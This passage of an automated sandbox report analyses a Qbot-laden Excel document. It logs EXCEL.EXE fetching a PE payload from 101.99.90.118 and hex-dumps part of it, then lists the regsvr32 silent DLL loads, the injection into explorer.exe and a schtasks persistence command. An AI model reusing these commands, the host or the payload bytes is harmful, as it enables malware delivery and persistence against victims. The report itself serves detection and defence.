Oct 5, 2021 22:18:05.480911016 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480923891 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480958939 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.482379913 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.487390041 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.520730972 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.520829916 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.657453060 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.657522917 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.657577038 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.657639027 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.657710075 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.657717943 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.657762051 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.657771111 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.657798052 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.657840967 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.657906055 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.657943010 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.657974958 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.657982111 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658003092 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658019066 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658035040 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658067942 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658088923 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658111095 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658118010 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658149958 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658186913 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658189058 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658225060 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658236980 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658248901 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658274889 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658313036 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658315897 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658339977 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658350945 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658368111 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658397913 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658411026 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658440113 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658467054 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658478022 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658493996 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658516884 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658521891 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658555984 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658582926 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658592939 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658608913 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658652067 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658890963 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658930063 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.658966064 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.658986092 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.659009933 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659053087 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659081936 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.659089088 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659106970 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.659132004 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.659169912 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659209967 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659239054 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.659249067 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659277916 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659308910 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659338951 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659368992 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.659590960 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660312891 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660399914 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660437107 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660485983 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660545111 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660557985 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660609007 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660612106 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660660028 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660670996 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660712004 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660722017 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660751104 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660759926 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660801888 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660813093 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660837889 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660839081 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660877943 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660887957 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660914898 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660918951 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660952091 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.660964966 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.660995007 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.661849976 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.661917925 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.661964893 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662022114 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662022114 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662054062 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662074089 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662101030 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662112951 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662163973 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662185907 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662219048 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662237883 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662249088 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662267923 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662285089 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662296057 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662318945 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662322044 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662347078 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662367105 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662377119 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662395000 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662405968 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662422895 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662453890 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662863970 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662898064 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662928104 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662938118 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662954092 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.662959099 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.662985086 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.663002014 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.663011074 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.663032055 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.663053989 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.663062096 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.663083076 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.663098097 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.663110971 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.663155079 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.663177013 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.663189888 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.663204908 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.663220882 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.663240910 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.663248062 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.663261890 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.663290024 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.670778990 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.673140049 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:19:10.662410975 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:19:10.662672997 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:20:27.874180079 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:20:28.341586113 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:20:29.246495962 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:20:31.056395054 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:20:34.660202980 CEST	49169	80	192.168.2.22	101.99.90.118

HTTP Request Dependency Graph

101.99.90.118

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49169	101.99.90.118	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Oct 5, 2021 22:18:02.377396107 CEST	1	OUT	GET /44474.9279916667.dat HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 101.99.90.118 Connection: Keep-Alive
Oct 5, 2021 22:18:03.288743973 CEST	3	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 05 Oct 2021 20:18:03 GMT Content-Type: application/octet-stream Content-Length: 1079808 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44474.9279916667.dat" Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 21 b1 75 9e 40 df 26 9e 40 df 26 9e 40 df 26 2d dc 3e 26 a1 40 df 26 2d dc 3f 26 9f 40 df 26 2a dc 2d 26 95 40 df 26 2a dc 2d 26 86 40 df 26 9e 40 de 26 4c 40 df 26 2a dc 2f 26 97 40 df 26 2a dc 2c 26 99 40 df 26 2a dc 30 26 9f 40 df 26 2a dc 28 26 0c 40 df 26 2a dc 31 26 9f 40 df 26 2a dc 2e 26 9f 40 df 26 52 69 63 68 9e 40 df 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 19 cc 90 5d 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 0a 00 0e 04 00 00 12 9d 00 00 00 00 00 f1 54 00 00 00 10 00 00 00 20 04 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 a1 00 00 04 00 00 64 c3 10 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4e 10 00 a8 00 00 00 48 4f 10 00 50 00 00 00 00 20 a1 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 a1 00 3c 1c 00 00 a0 3b 10 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 3b 10 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 04 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 de 0c 04 00 00 10 00 00 00 0e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 37 0c 00 00 20 04 00 00 38 0c 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 b4 90 00 00 60 10 00 00 0c 00 00 00 4a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 04 00 00 00 20 a1 00 00 06 00 00 00 56 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 1c 00 00 00 30 a1 00 00 1e 00 00 00 5c 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!u@&@&@&->&@&-?&@&-&@&-&@&@&L@&/&@&,&@&0&@&(&@&1&@&.&@&Rich@&PEL]!T Pd@NHOP X0<;T;@ \.text `.rdataL7 8@@.data`J@.rsrcX V@@.reloc<0\@B
Oct 5, 2021 22:18:03.288815975 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 6a ff 68 20 1a 04 10 64 a1 00 00 00 00 50 a1 68 60 10 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 6a 00 b9 e0 14 a1 10 c7 45 fc 00 00 00 00 e8 1b 11 00 00 68 90 1c 04 10 Data Ascii: Ujh dPh`3PEdjEhLAMdY]U<p3- ]h@Yh@Yk7h@Yh@Yl7
Oct 5, 2021 22:18:03.288870096 CEST	6	IN	Data Raw: 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 fa 00 00 00 52 51 e8 5b 3c 00 00 83 c4 08 8b 55 b8 c7 45 cc 00 00 00 00 c7 45 d0 0f 00 00 00 c6 45 bc 00 83 fa 10 72 2c 8b 4d a4 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 Data Ascii: rI#+RQ[<UEEEr,MBrI#+RQ<UEEEr+tBrI#+wyRQ;UEEtr(MBrI#+w9RQ;
Oct 5, 2021 22:18:03.288928986 CEST	7	IN	Data Raw: 2b c2 83 c0 fc 83 f8 1f 77 1f 8b c2 51 50 e8 31 37 00 00 83 c4 08 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00 5e c3 e8 72 72 00 00 cc cc cc cc cc cc 8b 54 24 04 8b c2 56 8b f1 57 8d 78 01 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00 Data Ascii: +wQP17FF^rrT$VWxFFf@u+PR_^Ujh@dP8SVWh`3PEdME3E]]<uGJ+ttQMEMQrMP]
Oct 5, 2021 22:18:03.288986921 CEST	8	IN	Data Raw: 00 59 5f 5e 5b 8b e5 5d c2 04 00 e8 5a 04 00 00 e8 55 04 00 00 e8 4c 6d 00 00 f4 1d 00 10 23 1e 00 10 93 1e 00 10 3e 1f 00 10 3e 1f 00 10 3e 1f 00 10 3e 1f 00 10 e2 1e 00 10 51 53 56 8b f1 57 8b 7c 24 18 8b 4e 14 89 4c 24 0c 3b f9 77 27 8b de 83 Data Ascii: Y_^[]ZULm#>>>>QSVW\|$NL$;w'rWt$~SH;_^[Yv+;v;BKUr#A#;FP-tth#EtQ-
Oct 5, 2021 22:18:03.289041996 CEST	10	IN	Data Raw: 72 12 8b 4e fc 83 c0 23 2b f1 83 c6 fc 83 fe 1f 77 2f 8b f1 50 56 e8 b5 2c 00 00 83 c4 08 8b 44 24 10 8b 4c 24 0c c1 e0 04 03 c1 89 0f 89 47 04 8b 44 24 14 c1 e0 04 03 c1 89 47 08 5f 5e c2 0c 00 e8 e6 67 00 00 cc cc cc cc cc cc cc cc cc cc 8b 44 Data Ascii: rN#+w/PV,D$L$GD$G_^gD$SVt$W;tAT$ WfD$+\|$\$HLHLXx;u_^[UjhdPSVWh`3PEd}EGG
Oct 5, 2021 22:18:03.289086103 CEST	10	IN	Data Raw: 18 41 c6 00 00 81 f9 00 10 00 00 72 12 8b 57 fc 83 c1 23 2b fa 8d 47 fc 83 f8 1f 77 48 8b fa 51 57 e8 70 27 00 00 83 c4 08 89 33 8b c3 5f 5e 5d 5b 59 c2 10 00 53 56 e8 0a 38 00 00 ff 74 24 30 ff 74 24 30 57 e8 fc 37 00 00 8b 44 24 28 83 c4 18 5f Data Ascii: ArW#+GwHQWp'3_^][YSV8t$0t$0W7D$(_3^][YbQSUl$+C+=K+Vp
Oct 5, 2021 22:18:03.289144039 CEST	11	IN	Data Raw: ff 0f 2b c2 89 74 24 0c 57 3b c8 76 04 8b fe eb 08 8d 3c 0a 3b fe 0f 42 fe 8b cf c1 e1 04 81 ff ff ff ff 0f 76 05 83 c9 ff eb 08 81 f9 00 10 00 00 72 27 8d 41 23 83 ca ff 3b c1 0f 46 c2 50 e8 16 23 00 00 83 c4 04 85 c0 0f 84 97 00 00 00 8d 70 23 Data Ascii: +t$W;v<;Bvr'A#;FP#p#FtQ"3L$V.AD.AD.D$AAS;uRQPQEPst$ Wt$V_^][Yg^aVt$
Oct 5, 2021 22:18:03.289211035 CEST	13	IN	Data Raw: 00 8b f9 55 57 e8 a9 21 00 00 8b 44 24 18 83 c4 08 89 1e 89 46 10 5f 5b 5e 5d 59 c2 04 00 56 53 e8 3e 32 00 00 8b 44 24 1c 83 c4 0c 89 1e 89 46 10 5f 5b 5e 5d 59 c2 04 00 83 fd 10 73 42 83 fb 10 72 3d 8b 3e 40 50 57 56 e8 15 32 00 00 8b 4e 14 83 Data Ascii: UW!D$F_[^]YVS>2D$F_[^]YsBr=>@PWV2NArW#+GwQW=!F_[^]Y\qUW\|$MU+;wp:ESVruL$9;v;w;w3+BP>VP8St$(Vm
Oct 5, 2021 22:18:03.460503101 CEST	14	IN	Data Raw: 89 70 04 8b 46 04 89 41 04 8b 45 00 3b 70 04 75 05 89 48 04 eb 0f 8b 46 04 3b 70 08 75 05 89 48 08 eb 02 89 08 89 71 08 89 4e 04 8b 0e 80 79 0d 00 75 15 8b 51 08 80 7a 0c 01 75 38 8b 01 80 78 0c 01 75 30 c6 41 0c 00 8b 45 00 8b fb 8b 76 04 3b 58 Data Ascii: pFAE;puHF;puHqNyuQzu8xu0AEv;XGMD$_^tIM][YxuBAQ}FAFV@T$V2FFxuPBF;PupVr^B;PupVr^0
Oct 5, 2021 22:18:03.460566044 CEST	15	IN	Data Raw: 74 07 1b c0 83 c8 01 eb 02 33 c0 85 c0 75 0d 3b fb 76 05 83 c8 ff eb 04 1b c0 f7 d8 c1 e8 1f 84 c0 0f 84 f1 03 00 00 ff 75 14 8b 75 08 51 ff 75 d8 8b 4d e4 6a 00 56 e8 c3 04 00 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 10 00 Data Ascii: t3u;vuuQuMjVMdY_^[]z$Z]rExr8U@uEB;UBrf;ust4:u't)G:AutG:AutG:At3uB ];v

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3068 Parent PID: 596

General

Start time:	22:16:15
Start date:	05/10/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f280000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: regsvr32.exe PID: 1892 Parent PID: 3068

General

Start time:	22:17:46
Start date:	05/10/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Celod.wac
Imagebase:	0xffa30000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 1988 Parent PID: 3068

General

Start time:	22:17:46
Start date:	05/10/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Celod.wac1
Imagebase:	0xffa30000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2988 Parent PID: 3068

General

Start time:	22:17:47
Start date:	05/10/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 -silent ..\Celod.wac2
Imagebase:	0xffa30000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3024 Parent PID: 2988

General

Start time:	22:17:47
Start date:	05/10/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-silent ..\Celod.wac2
Imagebase:	0xf10000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000008.00000003.642150052.00000000004C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 2556 Parent PID: 3024

General

Start time:	22:18:09
Start date:	05/10/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x410000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 1172 Parent PID: 2556

General

Start time:	22:18:11
Start date:	05/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32
Imagebase:	0x650000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 2568 Parent PID: 1672

General

Start time:	22:18:14
Start date:	05/10/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
